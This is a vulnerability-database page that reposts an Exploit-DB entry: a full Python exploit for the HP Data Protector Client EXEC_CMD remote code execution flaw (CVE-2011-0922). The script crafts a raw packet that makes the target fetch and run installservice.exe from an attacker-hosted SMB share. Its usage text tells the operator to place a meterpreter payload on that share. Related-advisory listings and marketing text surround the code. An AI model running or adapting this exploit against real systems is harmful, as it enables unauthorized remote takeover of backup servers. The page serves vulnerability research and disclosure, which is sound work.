Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HP Data Protector Client - EXEC_CMD Remote Code Execution

🗓️ 19 Jun 2012 00:00:00Reported by Ben TurnerType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 29 Views

HP Data Protector Client EXEC_CMD Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		HP Data Protector Client EXEC_SETUP Code Execution PoC (ZDI-11-056)
29 May 201100:00
zdt
0day.today		HP Data Protector Client EXEC_CMD Remote Code Execution
19 Jun 201200:00
zdt
0day.today		HP Data Protector CMD Install Service Vulnerability (msf)
3 Aug 201300:00
zdt
Circl		CVE-2011-0922
29 May 201100:00
circl
Check Point Advisories		HP Data Protector Backup Client Service EXEC_SETUP Code Execution (CVE-2011-0922)
15 May 201100:00
checkpoint_advisories
Check Point Advisories		HP Data Protector Backup Client Service Code Execution - Ver2 (CVE-2011-0922)
5 Jul 201800:00
checkpoint_advisories
CVE		CVE-2011-0922
9 Feb 201100:00
cve
Cvelist		CVE-2011-0922
9 Feb 201100:00
cvelist
Exploit DB		HP Data Protector Client 6.11 - 'EXEC_SETUP' Remote Code Execution
29 May 201100:00
exploitdb
Exploit DB		HP Data Protector - CMD Install Service (Metasploit)
2 Aug 201300:00
exploitdb
Rows per page
#!/usr/bin/env python

# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-12-06
# Exploit Author: Ben Turner
# Vendor Homepage: www.hp.com
# Version: 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143


import socket
import sys
import binascii

if len(sys.argv) != 4:
    print ""
    print "\033[0;31mUsage: ./hp_protector.py <Target IP> <Port> <Reverse IP> \033[0m" 
    print ""
    print "\033[0;32mMake sure you create a meterpreter payload and a share with the following \\\\<Reverse IP>\\Omniback\\i386\\installservice.exe\033[0m" 
    print "\033[0;32mAlso make sure the SYSTEM account on windows can access your share, this is not always trivial\033[0m"
    print ""
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
lhost = sys.argv[3]

# Create a Share with the following:
# Ensure you can access that share with the SYSTEM account on a machine - 
#
# \\ipaddress\Omniback\i386\installservice.exe


b = ''

for char in lhost:
	a = "\x00"+char
	b = b + a

#print b


payload = ("\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+ b + 
"\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
"\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+ b +
"\x5c\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+ b +
"\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
"\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00")

print payload

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
while 1:
        data = s.recv(4096)
        if data:
                print data
        else:
                break
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Jun 2012 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 210
EPSS0.82006
hp data protectorremote code executionvulnerabilitywindows 2003 servercve-2011-0922zdi-11-056hpben turner
29